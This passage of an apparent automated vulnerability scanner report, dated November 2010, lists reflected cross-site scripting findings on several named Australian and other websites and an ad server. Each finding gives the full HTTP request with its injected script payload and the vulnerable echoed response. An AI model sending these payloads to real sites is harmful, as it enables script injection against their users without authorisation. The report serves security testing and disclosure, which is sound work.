Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 9894
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:12:14 GMT

<html><head><title>20100604_4G_EVO_Airplane_v3_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
track_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D&4fd6f"-alert(1)-"4c15efcb345=1",
clickThruUrl: "http://clk.redcated/go/263234194/direct;wi.728;hi.90;ai.185123346;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_
...[SNIP]...

2.91. http://redcated/M0N/iview/263234194/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/M0N/iview/263234194/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd5a3"><script>alert(1)</script>697588e2459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /M0N/iview/263234194/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxKbadSwBAAAAAAAAAGMwMGYwNGJjLWY2OGQtMTFkZi1hMjgxLTAwMzA0OGQ2ZDI3MAAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esmh%2Ecom%2Eau%252Fsport%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D&dd5a3"><script>alert(1)</script>697588e2459=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 9960
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:12:13 GMT

<html><head><title>20100604_4G_EVO_Devices_v3_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
track_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D&dd5a3"><script>alert(1)</script>697588e2459=1\')(new Image).src=\'http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGA
...[SNIP]...

2.92. http://redcated/M0N/iview/263234194/direct [wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/M0N/iview/263234194/direct

Issue detail

The value of the wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d2f0'-alert(1)-'b93fbbd10c5 was submitted in the wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /M0N/iview/263234194/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxKbadSwBAAAAAAAAAGMwMGYwNGJjLWY2OGQtMTFkZi1hMjgxLTAwMzA0OGQ2ZDI3MAAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esmh%2Ecom%2Eau%252Fsport%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D4d2f0'-alert(1)-'b93fbbd10c5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 9874
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:12:14 GMT

<html><head><title>20100604_4G_EVO_Devices_v3_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D4d2f0'-alert(1)-'b93fbbd10c5');
}
else
{
_strContentSSC1285866172437 = '<a target="_blank" href="http://clk.atdmt.com/go/263234194/direct;wi.728;hi.90;ai.185123353;ct.1/01/" onclick="if(\'http%3A%2F%2Fad%2Eyieldmanager%2Ec
...[SNIP]...

2.93. http://redcated/M0N/iview/263234194/direct [wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/M0N/iview/263234194/direct

Issue detail

The value of the wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77848</script><script>alert(1)</script>88037413fc7 was submitted in the wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /M0N/iview/263234194/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxKbadSwBAAAAAAAAAGMwMGYwNGJjLWY2OGQtMTFkZi1hMjgxLTAwMzA0OGQ2ZDI3MAAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esmh%2Ecom%2Eau%252Fsport%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D77848</script><script>alert(1)</script>88037413fc7 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 9971
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:12:13 GMT

<html><head><title>20100622_4G_EVO_Reaction_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D77848</script><script>alert(1)</script>88037413fc7",
clickThruUrl: "http://clk.redcated/go/263234194/direct;wi.728;hi.90;ai.185076102;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id
...[SNIP]...

2.94. http://redcated/M0N/iview/263234194/http:/ad.yieldmanager.com/clk [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/M0N/iview/263234194/http:/ad.yieldmanager.com/clk

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5064a'%3b481ae1e506f was submitted in the REST URL parameter 4. This input was echoed as 5064a';481ae1e506f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /M0N/iview/263234194/http:5064a'%3b481ae1e506f/ad.yieldmanager.com/clk HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1290036034-1562307; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5; ach00=692f/1c58a; MUID=CEB33434C0164921BC56F0EB31A08430;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6510
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:15:40 GMT
Connection: close

<html><head><title>20100622_4G_EVO_Reaction_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/0SM0NSPRTSSC/2010/20100622_4G_EVO_Reaction_DV4_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/263234194/http:5064a';481ae1e506f;ai.185076102;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/263234194/http:5064a';481ae1e506f;ai.185076102;ct.1/01" />
...[SNIP]...

2.95. http://www.investsmart.com.au/managed-funds/top-managed-funds.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.investsmart.com.au
Path:	/managed-funds/top-managed-funds.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94b4e"><script>alert(1)</script>4b7028fd387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /managed-funds/top-managed-funds.asp?94b4e"><script>alert(1)</script>4b7028fd387=1 HTTP/1.1
Host: www.investsmart.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Nov 2010 23:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: BeenHereCookie=1; expires=Wed, 22-Dec-2010 23:15:04 GMT; path=/
Set-Cookie: ASPSESSIONIDSSTDAASR=IPBJIODBPJMCGEDOEHDCIOPH; path=/
Cache-control: private

<html>
<head>
<title>Top Performing Managed Funds</title>

<meta name="verify-v1" content="xgkff+3TBcugNz7JE2NiJoqkiVs1PHybWgFkaBuhblI=" />
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<a href="/managed-funds/top-managed-funds.asp?function=print&94b4e"><script>alert(1)</script>4b7028fd387=1" target="_blank" title="Displays a 'print-friendly' version of this page. Once displayed, print the page via your browser's normal print function.">
...[SNIP]...

2.96. http://www.investsmart.com.au/share_trading/one_off_sale.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.investsmart.com.au
Path:	/share_trading/one_off_sale.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f70"><script>alert(1)</script>7441789510a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share_trading/one_off_sale.asp?20f70"><script>alert(1)</script>7441789510a=1 HTTP/1.1
Host: www.investsmart.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Nov 2010 23:14:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 71323
Content-Type: text/html
Set-Cookie: BeenHereCookie=1; expires=Wed, 22-Dec-2010 23:14:52 GMT; path=/
Set-Cookie: ASPSESSIONIDSSTDAASR=JNBJIODBIFMAIGLMHBJGEDBM; path=/
Cache-control: private

<html>
<head>
<title>Share Trading - One-off Sale Facility</title>

<meta name="verify-v1" content="xgkff+3TBcugNz7JE2NiJoqkiVs1PHybWgFkaBuhblI=" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="/share_trading/one_off_sale.asp?function=print&20f70"><script>alert(1)</script>7441789510a=1" target="_blank" title="Displays a 'print-friendly' version of this page. Once displayed, print the page via your browser's normal print function.">
...[SNIP]...

2.97. http://www.rsvp.com.au/index.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.rsvp.com.au
Path:	/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c0a30<script>alert(1)</script>364558d2d85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jspc0a30<script>alert(1)</script>364558d2d85 HTTP/1.1
Host: www.rsvp.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html
Date: Mon, 22 Nov 2010 23:14:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>RSVP page not found</title>
<lin
...[SNIP]...
<p>HTTP Status 404 - /index.jspc0a30<script>alert(1)</script>364558d2d85</p>
...[SNIP]...

2.98. http://www.y-jesus.com/jesuscomplex_1_x.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.y-jesus.com
Path:	/jesuscomplex_1_x.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed12f"><script>alert(1)</script>de61be5eabf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed12f\"><script>alert(1)</script>de61be5eabf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jesuscomplex_1_x.php?ed12f"><script>alert(1)</script>de61be5eabf=1 HTTP/1.1
Host: www.y-jesus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:23:55 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 17962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>JESUS COMPLEX: Is Je
...[SNIP]...
<a href="#" onclick="MM_openBrWindow('http://y-jesus.org/?page_id=403&refpage=http://www.y-jesus.com/jesuscomplex_1_x.php?ed12f\"><script>alert(1)</script>de61be5eabf=1','contact','toolbar=no,location=no,status=no,scrollbars=auto,width=440,height=540')">
...[SNIP]...

2.99. http://mycareer.com.au/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload a077f--><script>alert(1)</script>ce8c47e45f8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a077f--><script>alert(1)</script>ce8c47e45f8
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95756
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=pnv0wf45zat2v2zwsw2c23in; path=/; HttpOnly
Date: Mon, 22 Nov 2010 23:34:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
mycareer_master;
Version: 10.114.0.0;
Processed: 10:34:35 23/11/2010;
Server: APMYCPWS011;
Skin: MyCareer;
IP: ;
Country: ;
ISP: ;
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a077f--><script>alert(1)</script>ce8c47e45f8
MYC Server Status: OK
-->

2.100. http://mycareer.com.au/7739281 [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/7739281

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b1dda--><script>alert(1)</script>18160668ea8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /7739281 HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b1dda--><script>alert(1)</script>18160668ea8
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61947
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ip3dc4j3kteure2criajk3bo; path=/; HttpOnly
Set-Cookie: jobHistory=7739281; domain=mycareer.com.au; path=/
Date: Mon, 22 Nov 2010 23:35:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
mycareer_master;
Version: 10.114.0.0;
Processed: 10:35:06 23/11/2010;
Server: APMYCPWS011;
Skin: MyCareer;
IP: ;
Country: ;
ISP: ;
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b1dda--><script>alert(1)</script>18160668ea8
MYC Server Status: OK
-->

2.101. http://mycareer.com.au/7742934 [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/7742934

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload b21c5--><script>alert(1)</script>9b1ad7d7fe1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /7742934 HTTP/1.1
Host: mycareer.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b21c5--><script>alert(1)</script>9b1ad7d7fe1
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 65618
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=vcwufifdnq4grq55nfpucj55; path=/; HttpOnly
Set-Cookie: jobHistory=7742934; domain=mycareer.com.au; path=/
Date: Mon, 22 Nov 2010 23:35:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-AU" lang="en-AU">
...[SNIP]...
mycareer_master;
Version: 10.114.0.0;
Processed: 10:35:05 23/11/2010;
Server: APMYCPWS011;
Skin: MyCareer;
IP: ;
Country: ;
ISP: ;
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b21c5--><script>alert(1)</script>9b1ad7d7fe1
MYC Server Status: OK
-->

2.102. http://mycareer.com.au/7748366 [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mycareer.com.au
Path:	/7748366

Issue detail

